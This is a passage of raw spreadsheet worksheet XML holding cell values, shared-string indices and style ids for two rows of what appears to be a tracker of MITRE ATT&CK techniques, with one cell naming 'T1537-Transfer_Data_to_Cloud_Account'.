      <c r="GN81" s="103">
        <v>6</v>
      </c>
      <c r="GO81" s="104">
        <v>6</v>
      </c>
      <c r="GP81" s="105">
        <v>0</v>
      </c>
      <c r="GQ81" s="106">
        <v>0</v>
      </c>
      <c r="GR81" s="497">
        <v>0</v>
      </c>
      <c r="GS81" s="107">
        <v>0</v>
      </c>
      <c r="GT81" s="107">
        <v>0</v>
      </c>
      <c r="GU81" s="108">
        <v>0</v>
      </c>
      <c r="GV81" s="109">
        <v>1</v>
      </c>
      <c r="GW81" s="110" t="s">
        <v>3571</v>
      </c>
      <c r="GX81" s="501">
        <v>1</v>
      </c>
      <c r="GY81" s="111" t="s">
        <v>3572</v>
      </c>
      <c r="GZ81" s="111">
        <v>1</v>
      </c>
      <c r="HA81" s="112">
        <v>1</v>
      </c>
      <c r="HB81" s="113">
        <v>11</v>
      </c>
      <c r="HC81" s="114" t="s">
        <v>3573</v>
      </c>
      <c r="HD81" s="503">
        <v>7</v>
      </c>
      <c r="HE81" s="115" t="s">
        <v>3574</v>
      </c>
      <c r="HF81" s="115">
        <v>4</v>
      </c>
      <c r="HG81" s="116">
        <v>5</v>
      </c>
      <c r="HH81" s="101">
        <v>2</v>
      </c>
      <c r="HI81" s="102" t="s">
        <v>3575</v>
      </c>
      <c r="HJ81" s="102">
        <v>2</v>
      </c>
      <c r="HK81" s="103" t="s">
        <v>319</v>
      </c>
      <c r="HL81" s="103">
        <v>1</v>
      </c>
      <c r="HM81" s="104">
        <v>2</v>
      </c>
      <c r="HN81" s="105">
        <v>0</v>
      </c>
      <c r="HO81" s="106">
        <v>0</v>
      </c>
      <c r="HP81" s="497">
        <v>0</v>
      </c>
      <c r="HQ81" s="107">
        <v>0</v>
      </c>
      <c r="HR81" s="107">
        <v>0</v>
      </c>
      <c r="HS81" s="108">
        <v>0</v>
      </c>
      <c r="HT81" s="109">
        <v>2</v>
      </c>
      <c r="HU81" s="110" t="s">
        <v>3575</v>
      </c>
      <c r="HV81" s="501">
        <v>2</v>
      </c>
      <c r="HW81" s="111" t="s">
        <v>319</v>
      </c>
      <c r="HX81" s="111">
        <v>1</v>
      </c>
      <c r="HY81" s="112">
        <v>2</v>
      </c>
      <c r="HZ81" s="113">
        <v>6</v>
      </c>
      <c r="IA81" s="114" t="s">
        <v>3576</v>
      </c>
      <c r="IB81" s="503">
        <v>3</v>
      </c>
      <c r="IC81" s="115" t="s">
        <v>3577</v>
      </c>
      <c r="ID81" s="115">
        <v>2</v>
      </c>
      <c r="IE81" s="116">
        <v>3</v>
      </c>
      <c r="IF81" s="250">
        <v>3</v>
      </c>
      <c r="IG81" s="251" t="s">
        <v>3578</v>
      </c>
      <c r="IH81" s="505">
        <v>3</v>
      </c>
      <c r="II81" s="252" t="s">
        <v>3579</v>
      </c>
      <c r="IJ81" s="252">
        <v>1</v>
      </c>
      <c r="IK81" s="253">
        <v>3</v>
      </c>
      <c r="IL81" s="101">
        <v>9</v>
      </c>
      <c r="IM81" s="102" t="s">
        <v>3580</v>
      </c>
      <c r="IN81" s="102">
        <v>6</v>
      </c>
      <c r="IO81" s="103" t="s">
        <v>3581</v>
      </c>
      <c r="IP81" s="103">
        <v>3</v>
      </c>
      <c r="IQ81" s="104">
        <v>6</v>
      </c>
      <c r="IR81" s="105">
        <v>0</v>
      </c>
      <c r="IS81" s="106">
        <v>0</v>
      </c>
      <c r="IT81" s="497">
        <v>0</v>
      </c>
      <c r="IU81" s="107">
        <v>0</v>
      </c>
      <c r="IV81" s="107">
        <v>0</v>
      </c>
      <c r="IW81" s="108">
        <v>0</v>
      </c>
      <c r="IX81" s="109">
        <v>4</v>
      </c>
      <c r="IY81" s="110" t="s">
        <v>1942</v>
      </c>
      <c r="IZ81" s="501">
        <v>1</v>
      </c>
      <c r="JA81" s="111" t="s">
        <v>1933</v>
      </c>
      <c r="JB81" s="111">
        <v>1</v>
      </c>
      <c r="JC81" s="112">
        <v>1</v>
      </c>
      <c r="JD81" s="113">
        <v>6</v>
      </c>
      <c r="JE81" s="114" t="s">
        <v>3576</v>
      </c>
      <c r="JF81" s="503">
        <v>3</v>
      </c>
      <c r="JG81" s="115" t="s">
        <v>3577</v>
      </c>
      <c r="JH81" s="115">
        <v>2</v>
      </c>
      <c r="JI81" s="116">
        <v>3</v>
      </c>
      <c r="JJ81" s="101">
        <v>0</v>
      </c>
      <c r="JK81" s="102">
        <v>0</v>
      </c>
      <c r="JL81" s="102">
        <v>0</v>
      </c>
      <c r="JM81" s="103">
        <v>0</v>
      </c>
      <c r="JN81" s="103">
        <v>0</v>
      </c>
      <c r="JO81" s="104">
        <v>0</v>
      </c>
      <c r="JP81" s="105">
        <v>0</v>
      </c>
      <c r="JQ81" s="106">
        <v>0</v>
      </c>
      <c r="JR81" s="497">
        <v>0</v>
      </c>
      <c r="JS81" s="107">
        <v>0</v>
      </c>
      <c r="JT81" s="107">
        <v>0</v>
      </c>
      <c r="JU81" s="108">
        <v>0</v>
      </c>
      <c r="JV81" s="109">
        <v>0</v>
      </c>
      <c r="JW81" s="110">
        <v>0</v>
      </c>
      <c r="JX81" s="501">
        <v>0</v>
      </c>
      <c r="JY81" s="111">
        <v>0</v>
      </c>
      <c r="JZ81" s="111">
        <v>0</v>
      </c>
      <c r="KA81" s="112">
        <v>0</v>
      </c>
      <c r="KB81" s="113">
        <v>0</v>
      </c>
      <c r="KC81" s="114">
        <v>0</v>
      </c>
      <c r="KD81" s="503">
        <v>0</v>
      </c>
      <c r="KE81" s="115">
        <v>0</v>
      </c>
      <c r="KF81" s="115">
        <v>0</v>
      </c>
      <c r="KG81" s="116">
        <v>0</v>
      </c>
      <c r="KH81" s="250">
        <v>0</v>
      </c>
      <c r="KI81" s="251">
        <v>0</v>
      </c>
      <c r="KJ81" s="505">
        <v>0</v>
      </c>
      <c r="KK81" s="252">
        <v>0</v>
      </c>
      <c r="KL81" s="252">
        <v>0</v>
      </c>
      <c r="KM81" s="253">
        <v>0</v>
      </c>
      <c r="KN81" s="101">
        <v>0</v>
      </c>
      <c r="KO81" s="102">
        <v>0</v>
      </c>
      <c r="KP81" s="102">
        <v>0</v>
      </c>
      <c r="KQ81" s="103">
        <v>0</v>
      </c>
      <c r="KR81" s="103">
        <v>0</v>
      </c>
      <c r="KS81" s="104">
        <v>0</v>
      </c>
      <c r="KT81" s="105">
        <v>0</v>
      </c>
      <c r="KU81" s="106">
        <v>0</v>
      </c>
      <c r="KV81" s="497">
        <v>0</v>
      </c>
      <c r="KW81" s="107">
        <v>0</v>
      </c>
      <c r="KX81" s="107">
        <v>0</v>
      </c>
      <c r="KY81" s="108">
        <v>0</v>
      </c>
      <c r="KZ81" s="109">
        <v>0</v>
      </c>
      <c r="LA81" s="110">
        <v>0</v>
      </c>
      <c r="LB81" s="501">
        <v>0</v>
      </c>
      <c r="LC81" s="111">
        <v>0</v>
      </c>
      <c r="LD81" s="111">
        <v>0</v>
      </c>
      <c r="LE81" s="112">
        <v>0</v>
      </c>
      <c r="LF81" s="113">
        <v>0</v>
      </c>
      <c r="LG81" s="114">
        <v>0</v>
      </c>
      <c r="LH81" s="503">
        <v>0</v>
      </c>
      <c r="LI81" s="115">
        <v>0</v>
      </c>
      <c r="LJ81" s="115">
        <v>0</v>
      </c>
      <c r="LK81" s="116">
        <v>0</v>
      </c>
      <c r="LL81" s="117">
        <v>10</v>
      </c>
      <c r="LM81" s="507">
        <v>10</v>
      </c>
      <c r="LN81" s="119">
        <v>0</v>
      </c>
      <c r="LO81" s="119">
        <v>4</v>
      </c>
      <c r="LP81" s="119">
        <v>10</v>
      </c>
      <c r="LQ81" s="119">
        <v>0</v>
      </c>
      <c r="LR81" s="119">
        <v>10</v>
      </c>
      <c r="LS81" s="119">
        <v>10</v>
      </c>
      <c r="LT81" s="382"/>
      <c r="LU81" s="117">
        <v>0</v>
      </c>
      <c r="LV81" s="118">
        <v>0</v>
      </c>
      <c r="LW81" s="507">
        <v>0</v>
      </c>
      <c r="LX81" s="119">
        <v>0</v>
      </c>
      <c r="LY81" s="119">
        <v>0</v>
      </c>
      <c r="LZ81" s="119">
        <v>0</v>
      </c>
      <c r="MA81" s="117">
        <v>0</v>
      </c>
      <c r="MB81" s="118">
        <v>0</v>
      </c>
      <c r="MC81" s="507">
        <v>0</v>
      </c>
      <c r="MD81" s="119">
        <v>0</v>
      </c>
      <c r="ME81" s="119">
        <v>0</v>
      </c>
      <c r="MF81" s="119">
        <v>0</v>
      </c>
      <c r="MG81" s="117">
        <v>0</v>
      </c>
      <c r="MH81" s="118">
        <v>0</v>
      </c>
      <c r="MI81" s="507">
        <v>0</v>
      </c>
      <c r="MJ81" s="119">
        <v>0</v>
      </c>
      <c r="MK81" s="119">
        <v>0</v>
      </c>
      <c r="ML81" s="119">
        <v>0</v>
      </c>
      <c r="MM81" s="117">
        <v>0</v>
      </c>
      <c r="MN81" s="118">
        <v>0</v>
      </c>
      <c r="MO81" s="507">
        <v>0</v>
      </c>
      <c r="MP81" s="119">
        <v>0</v>
      </c>
      <c r="MQ81" s="119">
        <v>0</v>
      </c>
      <c r="MR81" s="119">
        <v>0</v>
      </c>
      <c r="MS81" s="117">
        <v>0</v>
      </c>
      <c r="MT81" s="118">
        <v>0</v>
      </c>
      <c r="MU81" s="507">
        <v>0</v>
      </c>
      <c r="MV81" s="119">
        <v>0</v>
      </c>
      <c r="MW81" s="119">
        <v>0</v>
      </c>
      <c r="MX81" s="119">
        <v>0</v>
      </c>
      <c r="MY81" s="117">
        <v>0</v>
      </c>
      <c r="MZ81" s="118">
        <v>0</v>
      </c>
      <c r="NA81" s="507">
        <v>0</v>
      </c>
      <c r="NB81" s="119">
        <v>0</v>
      </c>
      <c r="NC81" s="119">
        <v>0</v>
      </c>
      <c r="ND81" s="119">
        <v>0</v>
      </c>
      <c r="NE81" s="117">
        <v>0</v>
      </c>
      <c r="NF81" s="118">
        <v>0</v>
      </c>
      <c r="NG81" s="507">
        <v>0</v>
      </c>
      <c r="NH81" s="119">
        <v>0</v>
      </c>
      <c r="NI81" s="119">
        <v>0</v>
      </c>
      <c r="NJ81" s="119">
        <v>0</v>
      </c>
      <c r="NK81" s="117">
        <v>4</v>
      </c>
      <c r="NL81" s="118" t="s">
        <v>4399</v>
      </c>
      <c r="NM81" s="507">
        <v>4</v>
      </c>
      <c r="NN81" s="119" t="s">
        <v>4261</v>
      </c>
      <c r="NO81" s="119">
        <v>2</v>
      </c>
      <c r="NP81" s="119">
        <v>4</v>
      </c>
      <c r="NQ81" s="117">
        <v>0</v>
      </c>
      <c r="NR81" s="118">
        <v>0</v>
      </c>
      <c r="NS81" s="507">
        <v>0</v>
      </c>
      <c r="NT81" s="119">
        <v>0</v>
      </c>
      <c r="NU81" s="119">
        <v>0</v>
      </c>
      <c r="NV81" s="119">
        <v>0</v>
      </c>
      <c r="NW81" s="117">
        <v>6</v>
      </c>
      <c r="NX81" s="118" t="s">
        <v>4262</v>
      </c>
      <c r="NY81" s="507">
        <v>6</v>
      </c>
      <c r="NZ81" s="119" t="s">
        <v>4263</v>
      </c>
      <c r="OA81" s="119">
        <v>2</v>
      </c>
      <c r="OB81" s="119">
        <v>6</v>
      </c>
      <c r="OC81" s="120">
        <v>0</v>
      </c>
      <c r="OD81" s="120">
        <v>0</v>
      </c>
      <c r="OE81" s="120">
        <v>0</v>
      </c>
      <c r="OF81" s="121">
        <v>0</v>
      </c>
      <c r="OG81" s="120">
        <v>0</v>
      </c>
      <c r="OH81" s="120">
        <v>0</v>
      </c>
      <c r="OI81" s="120">
        <v>0</v>
      </c>
      <c r="OJ81" s="120">
        <v>0</v>
      </c>
      <c r="OK81" s="383"/>
      <c r="OL81" s="120">
        <v>0</v>
      </c>
      <c r="OM81" s="120">
        <v>0</v>
      </c>
      <c r="ON81" s="120">
        <v>0</v>
      </c>
      <c r="OO81" s="120"/>
      <c r="OP81" s="120">
        <v>0</v>
      </c>
      <c r="OQ81" s="464">
        <v>0</v>
      </c>
      <c r="OR81" s="120">
        <v>0</v>
      </c>
      <c r="OS81" s="120">
        <v>0</v>
      </c>
      <c r="OT81" s="120">
        <v>0</v>
      </c>
      <c r="OU81" s="120"/>
      <c r="OV81" s="120">
        <v>0</v>
      </c>
      <c r="OW81" s="464">
        <v>0</v>
      </c>
      <c r="OX81" s="120">
        <v>0</v>
      </c>
      <c r="OY81" s="120">
        <v>0</v>
      </c>
      <c r="OZ81" s="120">
        <v>0</v>
      </c>
      <c r="PA81" s="120"/>
      <c r="PB81" s="120">
        <v>0</v>
      </c>
      <c r="PC81" s="464">
        <v>0</v>
      </c>
      <c r="PD81" s="120">
        <v>0</v>
      </c>
      <c r="PE81" s="120">
        <v>0</v>
      </c>
      <c r="PF81" s="120">
        <v>0</v>
      </c>
      <c r="PG81" s="120"/>
      <c r="PH81" s="120">
        <v>0</v>
      </c>
      <c r="PI81" s="464">
        <v>0</v>
      </c>
      <c r="PJ81" s="120">
        <v>0</v>
      </c>
      <c r="PK81" s="120">
        <v>0</v>
      </c>
      <c r="PL81" s="120">
        <v>0</v>
      </c>
      <c r="PM81" s="120"/>
      <c r="PN81" s="120">
        <v>0</v>
      </c>
      <c r="PO81" s="464">
        <v>0</v>
      </c>
      <c r="PP81" s="120">
        <v>0</v>
      </c>
      <c r="PQ81" s="120">
        <v>0</v>
      </c>
      <c r="PR81" s="120">
        <v>0</v>
      </c>
      <c r="PS81" s="120"/>
      <c r="PT81" s="120">
        <v>0</v>
      </c>
      <c r="PU81" s="464">
        <v>0</v>
      </c>
      <c r="PV81" s="120">
        <v>0</v>
      </c>
      <c r="PW81" s="120">
        <v>0</v>
      </c>
      <c r="PX81" s="120">
        <v>0</v>
      </c>
      <c r="PY81" s="120"/>
      <c r="PZ81" s="120">
        <v>0</v>
      </c>
      <c r="QA81" s="464">
        <v>0</v>
      </c>
      <c r="QB81" s="120">
        <v>0</v>
      </c>
      <c r="QC81" s="120">
        <v>0</v>
      </c>
      <c r="QD81" s="120">
        <v>0</v>
      </c>
      <c r="QE81" s="120"/>
      <c r="QF81" s="120">
        <v>0</v>
      </c>
      <c r="QG81" s="464">
        <v>0</v>
      </c>
      <c r="QH81" s="120">
        <v>0</v>
      </c>
      <c r="QI81" s="120">
        <v>0</v>
      </c>
      <c r="QJ81" s="120">
        <v>0</v>
      </c>
      <c r="QK81" s="120"/>
      <c r="QL81" s="120">
        <v>0</v>
      </c>
      <c r="QM81" s="464">
        <v>0</v>
      </c>
      <c r="QN81" s="120">
        <v>0</v>
      </c>
      <c r="QO81" s="120">
        <v>0</v>
      </c>
      <c r="QP81" s="120">
        <v>0</v>
      </c>
      <c r="QQ81" s="120"/>
      <c r="QR81" s="120">
        <v>0</v>
      </c>
      <c r="QS81" s="464">
        <v>0</v>
      </c>
      <c r="QT81" s="184"/>
      <c r="QU81" s="184"/>
      <c r="QV81" s="184"/>
      <c r="QW81" s="184"/>
      <c r="QX81" s="184"/>
      <c r="QY81" s="184"/>
      <c r="QZ81" s="184"/>
      <c r="RA81" s="184"/>
      <c r="RB81" s="184"/>
      <c r="RC81" s="184"/>
      <c r="RD81" s="184"/>
      <c r="RE81" s="184"/>
      <c r="RF81" s="184"/>
      <c r="RG81" s="184"/>
      <c r="RH81" s="184"/>
      <c r="RI81" s="184"/>
      <c r="RJ81" s="184"/>
      <c r="RK81" s="184"/>
      <c r="RL81" s="184"/>
      <c r="RM81" s="184"/>
      <c r="RN81" s="184"/>
      <c r="RO81" s="184"/>
      <c r="RP81" s="184"/>
      <c r="RQ81" s="184"/>
      <c r="RR81" s="184"/>
      <c r="RS81" s="184"/>
      <c r="RT81" s="184"/>
      <c r="RU81" s="184"/>
      <c r="RV81" s="184"/>
      <c r="RW81" s="184"/>
      <c r="RX81" s="184"/>
      <c r="RY81" s="184"/>
      <c r="RZ81" s="184"/>
      <c r="SA81" s="184"/>
      <c r="SB81" s="184"/>
      <c r="SC81" s="184"/>
      <c r="SD81" s="184"/>
      <c r="SE81" s="184"/>
      <c r="SF81" s="184"/>
      <c r="SG81" s="184"/>
      <c r="SH81" s="184"/>
      <c r="SI81" s="184"/>
      <c r="SJ81" s="184"/>
      <c r="SK81" s="184"/>
      <c r="SL81" s="184"/>
      <c r="SM81" s="184"/>
      <c r="SN81" s="184"/>
      <c r="SO81" s="184"/>
      <c r="SP81" s="184"/>
      <c r="SQ81" s="184"/>
      <c r="SR81" s="184"/>
      <c r="SS81" s="184"/>
      <c r="ST81" s="184"/>
      <c r="SU81" s="184"/>
      <c r="SV81" s="184"/>
      <c r="SW81" s="184"/>
      <c r="SX81" s="184"/>
      <c r="SY81" s="184"/>
      <c r="SZ81" s="184"/>
      <c r="TA81" s="184"/>
      <c r="TB81" s="184"/>
      <c r="TC81" s="184"/>
      <c r="TD81" s="184"/>
      <c r="TE81" s="184"/>
      <c r="TF81" s="184"/>
      <c r="TG81" s="184"/>
      <c r="TH81" s="184"/>
      <c r="TI81" s="184"/>
      <c r="TJ81" s="184"/>
      <c r="TK81" s="184"/>
      <c r="TL81" s="184"/>
      <c r="TM81" s="184"/>
      <c r="TN81" s="184"/>
      <c r="TO81" s="184"/>
      <c r="TP81" s="184"/>
      <c r="TQ81" s="184"/>
      <c r="TR81" s="184"/>
      <c r="TS81" s="184"/>
      <c r="TT81" s="184"/>
      <c r="TU81" s="184"/>
      <c r="TV81" s="184"/>
      <c r="TW81" s="184"/>
      <c r="TX81" s="184"/>
      <c r="TY81" s="184"/>
      <c r="TZ81" s="184"/>
      <c r="UA81" s="184"/>
      <c r="UB81" s="184"/>
      <c r="UC81" s="184"/>
      <c r="UD81" s="184"/>
      <c r="UE81" s="184"/>
      <c r="UF81" s="184"/>
      <c r="UG81" s="184"/>
      <c r="UH81" s="184"/>
      <c r="UI81" s="184"/>
      <c r="UJ81" s="184"/>
      <c r="UK81" s="184"/>
      <c r="UL81" s="184"/>
      <c r="UM81" s="184"/>
      <c r="UN81" s="184"/>
      <c r="UO81" s="184"/>
      <c r="UP81" s="184"/>
      <c r="UQ81" s="184"/>
      <c r="UR81" s="184"/>
      <c r="US81" s="184"/>
      <c r="UT81" s="184"/>
      <c r="UU81" s="184"/>
      <c r="UV81" s="184"/>
      <c r="UW81" s="184"/>
      <c r="UX81" s="184"/>
      <c r="UY81" s="184"/>
      <c r="UZ81" s="184"/>
      <c r="VA81" s="184"/>
      <c r="VB81" s="184"/>
      <c r="VC81" s="184"/>
      <c r="VD81" s="184"/>
      <c r="VE81" s="184"/>
      <c r="VF81" s="184"/>
      <c r="VG81" s="184"/>
      <c r="VH81" s="184"/>
      <c r="VI81" s="184"/>
      <c r="VJ81" s="184"/>
      <c r="VK81" s="184"/>
      <c r="VL81" s="184"/>
      <c r="VM81" s="184"/>
      <c r="VN81" s="184"/>
      <c r="VO81" s="184"/>
      <c r="VP81" s="184"/>
      <c r="VQ81" s="184"/>
      <c r="VR81" s="184"/>
      <c r="VS81" s="184"/>
      <c r="VT81" s="184"/>
      <c r="VU81" s="184"/>
      <c r="VV81" s="184"/>
      <c r="VW81" s="184"/>
      <c r="VX81" s="184"/>
      <c r="VY81" s="184"/>
    </row>
    <row r="82" spans="1:597" ht="39.950000000000003" customHeight="1">
      <c r="A82" s="82" t="s">
        <v>14</v>
      </c>
      <c r="B82" s="83" t="s">
        <v>4</v>
      </c>
      <c r="C82" s="83" t="s">
        <v>318</v>
      </c>
      <c r="D82" s="83" t="s">
        <v>119</v>
      </c>
      <c r="E82" s="83">
        <f t="shared" si="5"/>
        <v>51</v>
      </c>
      <c r="F82" s="83" t="s">
        <v>120</v>
      </c>
      <c r="G82" s="83" t="s">
        <v>4</v>
      </c>
      <c r="H82" s="83" t="s">
        <v>4</v>
      </c>
      <c r="I82" s="81" t="s">
        <v>1446</v>
      </c>
      <c r="J82" s="85" t="s">
        <v>795</v>
      </c>
      <c r="K82" s="81" t="s">
        <v>1447</v>
      </c>
      <c r="L82" s="81" t="s">
        <v>1448</v>
      </c>
      <c r="M82" s="378" t="s">
        <v>243</v>
      </c>
      <c r="N82" s="74" t="str">
        <f t="shared" si="3"/>
        <v>OK</v>
      </c>
      <c r="O82" s="485" t="str">
        <f t="shared" si="4"/>
        <v>New</v>
      </c>
      <c r="P82" s="91"/>
      <c r="Q82" s="379" t="s">
        <v>8</v>
      </c>
      <c r="R82" s="92" t="s">
        <v>1449</v>
      </c>
      <c r="S82" s="93" t="s">
        <v>787</v>
      </c>
      <c r="T82" s="92" t="s">
        <v>1450</v>
      </c>
      <c r="U82" s="94" t="s">
        <v>1451</v>
      </c>
      <c r="V82" s="95" t="s">
        <v>821</v>
      </c>
      <c r="W82" s="96" t="s">
        <v>1452</v>
      </c>
      <c r="X82" s="97" t="s">
        <v>1453</v>
      </c>
      <c r="Y82" s="83" t="s">
        <v>1454</v>
      </c>
      <c r="Z82" s="188" t="s">
        <v>1455</v>
      </c>
      <c r="AA82" s="182" t="s">
        <v>745</v>
      </c>
      <c r="AB82" s="183" t="s">
        <v>745</v>
      </c>
      <c r="AC82" s="302" t="s">
        <v>745</v>
      </c>
      <c r="AD82" s="83"/>
      <c r="AE82" s="83"/>
      <c r="AF82" s="384" t="s">
        <v>4</v>
      </c>
      <c r="AG82" s="88" t="s">
        <v>745</v>
      </c>
      <c r="AH82" s="341" t="s">
        <v>746</v>
      </c>
      <c r="AI82" s="353" t="s">
        <v>756</v>
      </c>
      <c r="AJ82" s="353" t="s">
        <v>747</v>
      </c>
      <c r="AK82" s="354" t="s">
        <v>745</v>
      </c>
      <c r="AL82" s="355" t="s">
        <v>747</v>
      </c>
      <c r="AM82" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AN82" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AO82" s="359" t="s">
        <v>756</v>
      </c>
      <c r="AP82" s="385" t="str">
        <f>M82&amp;"-frag"</f>
        <v>T1537-Transfer_Data_to_Cloud_Account-frag</v>
      </c>
      <c r="AQ82" s="358">
        <v>76</v>
      </c>
      <c r="AR82" s="100"/>
      <c r="AS82" s="100">
        <v>2</v>
      </c>
      <c r="AT82" s="100">
        <v>0</v>
      </c>
      <c r="AU82" s="100">
        <v>2</v>
      </c>
      <c r="AV82" s="92" t="s">
        <v>4</v>
      </c>
      <c r="AW82" s="100">
        <v>1</v>
      </c>
      <c r="AX82" s="100">
        <v>1</v>
      </c>
      <c r="AY82" s="100">
        <v>0</v>
      </c>
      <c r="AZ82" s="100">
        <v>1</v>
      </c>
      <c r="BA82" s="381"/>
      <c r="BB82" s="101">
        <v>25</v>
      </c>
      <c r="BC82" s="102" t="s">
        <v>2039</v>
      </c>
      <c r="BD82" s="102">
        <v>25</v>
      </c>
      <c r="BE82" s="103" t="s">
        <v>2040</v>
      </c>
      <c r="BF82" s="103">
        <v>4</v>
      </c>
      <c r="BG82" s="104">
        <v>8</v>
      </c>
      <c r="BH82" s="105">
        <v>0</v>
      </c>
      <c r="BI82" s="106">
        <v>0</v>
      </c>
      <c r="BJ82" s="497">
        <v>0</v>
      </c>
      <c r="BK82" s="107">
        <v>0</v>
      </c>
      <c r="BL82" s="107">
        <v>0</v>
      </c>
      <c r="BM82" s="108">
        <v>0</v>
      </c>
      <c r="BN82" s="109">
        <v>25</v>
      </c>
      <c r="BO82" s="110" t="s">
        <v>2039</v>
      </c>
      <c r="BP82" s="501">
        <v>25</v>
      </c>
      <c r="BQ82" s="111" t="s">
        <v>2040</v>
      </c>
      <c r="BR82" s="111">
        <v>4</v>
      </c>
      <c r="BS82" s="112">
        <v>8</v>
      </c>
      <c r="BT82" s="113">
        <v>33</v>
      </c>
      <c r="BU82" s="114" t="s">
        <v>3582</v>
      </c>
      <c r="BV82" s="503">
        <v>33</v>
      </c>
      <c r="BW82" s="115" t="s">
        <v>3583</v>
      </c>
      <c r="BX82" s="115">
        <v>6</v>
      </c>
      <c r="BY82" s="116">
        <v>13</v>
      </c>
      <c r="BZ82" s="250">
        <v>17</v>
      </c>
      <c r="CA82" s="251" t="s">
        <v>3584</v>
      </c>
      <c r="CB82" s="505">
        <v>17</v>
      </c>
      <c r="CC82" s="252" t="s">
        <v>3585</v>
      </c>
      <c r="CD82" s="252">
        <v>5</v>
      </c>
      <c r="CE82" s="253">
        <v>13</v>
      </c>
      <c r="CF82" s="101">
        <v>50</v>
      </c>
      <c r="CG82" s="102" t="s">
        <v>3586</v>
      </c>
      <c r="CH82" s="102">
        <v>50</v>
      </c>
      <c r="CI82" s="103" t="s">
        <v>3587</v>
      </c>
      <c r="CJ82" s="103">
        <v>11</v>
      </c>
      <c r="CK82" s="104">
        <v>20</v>
      </c>
      <c r="CL82" s="105">
        <v>0</v>
      </c>
      <c r="CM82" s="106">
        <v>0</v>
      </c>
      <c r="CN82" s="497">
        <v>0</v>
      </c>
      <c r="CO82" s="107">
        <v>0</v>
      </c>
      <c r="CP82" s="107">
        <v>0</v>
      </c>
      <c r="CQ82" s="108">
        <v>0</v>
      </c>
      <c r="CR82" s="109">
        <v>5</v>
      </c>
      <c r="CS82" s="110" t="s">
        <v>1957</v>
      </c>
      <c r="CT82" s="501">
        <v>5</v>
      </c>
      <c r="CU82" s="111" t="s">
        <v>1947</v>
      </c>
      <c r="CV82" s="111">
        <v>1</v>
      </c>
      <c r="CW82" s="112">
        <v>5</v>
      </c>
      <c r="CX82" s="113">
        <v>30</v>
      </c>
      <c r="CY82" s="114" t="s">
        <v>2179</v>
      </c>
      <c r="CZ82" s="503">
        <v>30</v>
      </c>
      <c r="DA82" s="115" t="s">
        <v>2180</v>
      </c>
      <c r="DB82" s="115">
        <v>5</v>
      </c>
      <c r="DC82" s="116">
        <v>13</v>
      </c>
      <c r="DD82" s="101">
        <v>0</v>
      </c>
      <c r="DE82" s="102">
        <v>0</v>
      </c>
      <c r="DF82" s="102">
        <v>0</v>
      </c>
      <c r="DG82" s="103">
        <v>0</v>
      </c>
      <c r="DH82" s="103">
        <v>0</v>
      </c>
      <c r="DI82" s="104">
        <v>0</v>
      </c>
      <c r="DJ82" s="105">
        <v>0</v>
      </c>
      <c r="DK82" s="106">
        <v>0</v>
      </c>
      <c r="DL82" s="497">
        <v>0</v>
      </c>
      <c r="DM82" s="107">
        <v>0</v>
      </c>
      <c r="DN82" s="107">
        <v>0</v>
      </c>
      <c r="DO82" s="108">
        <v>0</v>
      </c>
      <c r="DP82" s="109">
        <v>0</v>
      </c>
      <c r="DQ82" s="110">
        <v>0</v>
      </c>
      <c r="DR82" s="501">
        <v>0</v>
      </c>
      <c r="DS82" s="111">
        <v>0</v>
      </c>
      <c r="DT82" s="111">
        <v>0</v>
      </c>
      <c r="DU82" s="112">
        <v>0</v>
      </c>
      <c r="DV82" s="113">
        <v>3</v>
      </c>
      <c r="DW82" s="114" t="s">
        <v>3588</v>
      </c>
      <c r="DX82" s="503">
        <v>3</v>
      </c>
      <c r="DY82" s="115" t="s">
        <v>3589</v>
      </c>
      <c r="DZ82" s="115">
        <v>1</v>
      </c>
      <c r="EA82" s="116">
        <v>3</v>
      </c>
      <c r="EB82" s="250">
        <v>0</v>
      </c>
      <c r="EC82" s="251">
        <v>0</v>
      </c>
      <c r="ED82" s="505">
        <v>0</v>
      </c>
      <c r="EE82" s="252">
        <v>0</v>
      </c>
      <c r="EF82" s="252">
        <v>0</v>
      </c>
      <c r="EG82" s="253">
        <v>0</v>
      </c>
      <c r="EH82" s="101">
        <v>3</v>
      </c>
      <c r="EI82" s="102" t="s">
        <v>3588</v>
      </c>
      <c r="EJ82" s="102">
        <v>3</v>
      </c>
      <c r="EK82" s="103" t="s">
        <v>3589</v>
      </c>
      <c r="EL82" s="103">
        <v>1</v>
      </c>
      <c r="EM82" s="104">
        <v>3</v>
      </c>
      <c r="EN82" s="105">
        <v>0</v>
      </c>
      <c r="EO82" s="106">
        <v>0</v>
      </c>
      <c r="EP82" s="497">
        <v>0</v>
      </c>
      <c r="EQ82" s="107">
        <v>0</v>
      </c>
      <c r="ER82" s="107">
        <v>0</v>
      </c>
      <c r="ES82" s="108">
        <v>0</v>
      </c>
      <c r="ET82" s="109">
        <v>0</v>
      </c>
      <c r="EU82" s="110">
        <v>0</v>
      </c>
      <c r="EV82" s="501">
        <v>0</v>
      </c>
      <c r="EW82" s="111">
        <v>0</v>
      </c>
      <c r="EX82" s="111">
        <v>0</v>
      </c>
      <c r="EY82" s="112">
        <v>0</v>
      </c>
      <c r="EZ82" s="113">
        <v>0</v>
      </c>
      <c r="FA82" s="114">
        <v>0</v>
      </c>
      <c r="FB82" s="503">
        <v>0</v>
      </c>
      <c r="FC82" s="115">
        <v>0</v>
      </c>
      <c r="FD82" s="115">
        <v>0</v>
      </c>
      <c r="FE82" s="116">
        <v>0</v>
      </c>
      <c r="FF82" s="101">
        <v>1</v>
      </c>
      <c r="FG82" s="102" t="s">
        <v>3590</v>
      </c>
      <c r="FH82" s="102">
        <v>1</v>
      </c>
      <c r="FI82" s="103" t="s">
        <v>1835</v>
      </c>
      <c r="FJ82" s="103">
        <v>1</v>
      </c>
      <c r="FK82" s="104">
        <v>1</v>
      </c>
      <c r="FL82" s="105">
        <v>0</v>
      </c>
      <c r="FM82" s="106">
        <v>0</v>
      </c>
      <c r="FN82" s="497">
        <v>0</v>
      </c>
      <c r="FO82" s="107">
        <v>0</v>
      </c>
      <c r="FP82" s="107">
        <v>0</v>
      </c>
      <c r="FQ82" s="108">
        <v>0</v>
      </c>
      <c r="FR82" s="109">
        <v>1</v>
      </c>
      <c r="FS82" s="110" t="s">
        <v>3590</v>
      </c>
      <c r="FT82" s="501">
        <v>1</v>
      </c>
      <c r="FU82" s="111" t="s">
        <v>1835</v>
      </c>
      <c r="FV82" s="111">
        <v>1</v>
      </c>
      <c r="FW82" s="112">
        <v>1</v>
      </c>
      <c r="FX82" s="113">
